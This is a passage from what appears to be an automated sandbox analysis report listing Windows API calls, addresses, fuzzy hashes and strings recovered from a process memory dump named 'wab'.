                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            • _snwprintf.MSVCRT ref: 0041100C
                                                                                            • wcscat.MSVCRT ref: 0041101F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 822687973-0
                                                                                            • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                            • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                            • malloc.MSVCRT ref: 00417459
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$??3@malloc
                                                                                            • String ID:
                                                                                            • API String ID: 4284152360-0
                                                                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2678498856-0
                                                                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Item
                                                                                            • String ID:
                                                                                            • API String ID: 3888421826-0
                                                                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00417B7B
                                                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3727323765-0
                                                                                            • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                            • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                            • malloc.MSVCRT ref: 00417407
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$??3@malloc
                                                                                            • String ID:
                                                                                            • API String ID: 4284152360-0
                                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040F673
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040F6E2
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                            • strlen.MSVCRT ref: 0040F70D
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00402FD7
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                            • strlen.MSVCRT ref: 00403006
                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                            • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                            • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                            • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                            • String ID:
                                                                                            • API String ID: 764393265-0
                                                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$System$File$LocalSpecific
                                                                                            • String ID:
                                                                                            • API String ID: 979780441-0
                                                                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memcpy.MSVCRT ref: 004134E0
                                                                                            • memcpy.MSVCRT ref: 004134F2
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                                            • String ID:
                                                                                            • API String ID: 1386444988-0
                                                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: InvalidateMessageRectSend
                                                                                            • String ID: d=E
                                                                                            • API String ID: 909852535-3703654223
                                                                                            • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                            • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                            • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                            • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 0040F79E
                                                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcschr$memcpywcslen
                                                                                            • String ID: "
                                                                                            • API String ID: 1983396471-123907689
                                                                                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                            • _memicmp.MSVCRT ref: 0040C00D
                                                                                            • memcpy.MSVCRT ref: 0040C024
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer_memicmpmemcpy
                                                                                            • String ID: URL
                                                                                            • API String ID: 2108176848-3574463123
                                                                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfmemcpy
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 2789212964-323797159
                                                                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf
                                                                                            • String ID: %%-%d.%ds
                                                                                            • API String ID: 3988819677-2008345750
                                                                                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040E770
                                                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendmemset
                                                                                            • String ID: F^@
                                                                                            • API String ID: 568519121-3652327722
                                                                                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PlacementWindowmemset
                                                                                            • String ID: WinPos
                                                                                            • API String ID: 4036792311-2823255486
                                                                                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                                                            • String ID: _lng.ini
                                                                                            • API String ID: 383090722-1948609170
                                                                                            • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                            • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                            • API String ID: 2773794195-880857682
                                                                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID:
                                                                                            • API String ID: 438689982-0
                                                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
